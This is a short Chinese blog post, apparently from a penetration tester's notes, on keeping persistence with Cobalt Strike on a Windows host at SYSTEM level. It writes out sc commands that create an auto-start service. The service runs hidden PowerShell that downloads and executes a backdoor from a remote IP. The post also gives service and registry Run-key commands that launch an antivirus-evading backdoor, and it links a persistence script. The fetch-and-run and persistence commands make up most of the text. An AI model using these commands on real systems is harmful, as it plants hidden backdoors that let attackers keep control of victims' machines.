• Cobalt Strike权限维持


    比较菜,目前需要上线的目标是system权限

    1、sc创建自启动服务

    以下命令都是在cs中执行的,在cmd中测试只需要删掉前面的shell就行

    先创建一个服务(需要system权限)

    shell sc create "shell" binpath= "cmd /c start powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.123.54/后门文件'))""

     因为是拿自己的电脑测试的,直接用win+r启动services.msc来查看服务状态确认一下,此时还是手动的。

     设置自启动

    shell sc config "shell" start= auto

    设置描述

    shell sc description "shell" "shell persistence"

    启动服务

    shell net start "shell"

    删除服务

    shell sc delete "shell"

    如果没有公网IP,也可以上传一个免杀后门到目标上,也是使用sc配置一个自启动服务来进行权限维持  

    sc create "shell_local" binpath= "C:UsersPublicBypassAV.exe(文件路径)"

    sc description "shell_local" "shell_local_persistence"

    sc config "shell_local" start= auto

    net start "shell_local"

    2、注册表自启动

    同样需要先需要上传一个免杀后门

    命令shell reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v "shell_regedit" /t REG_SZ /d "C:UsersPublicBypassAV.exe(文件路径)" /f

    要删除也简单shell reg delete HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v "shell_regedit"

     当然、也可以采用插件

    https://github.com/ZonkSec/persistence-aggressor-script


     

  • 相关阅读:
    Jmeter配置slave
    Jmeter集合ant进行操作
    PageObject设计模式进行自动化用例的设计方法
    同学,迭代器生成器了解一下
    面向对象的一些方法与属性
    断言与异常
    wtforms-表单生成及验证
    DBUtils--数据库连接池
    Flask请求流程超清大图
    PEP8规范
  • 原文地址:https://www.cnblogs.com/This-is-Y/p/13763667.html
Copyright © 2020-2023  润新知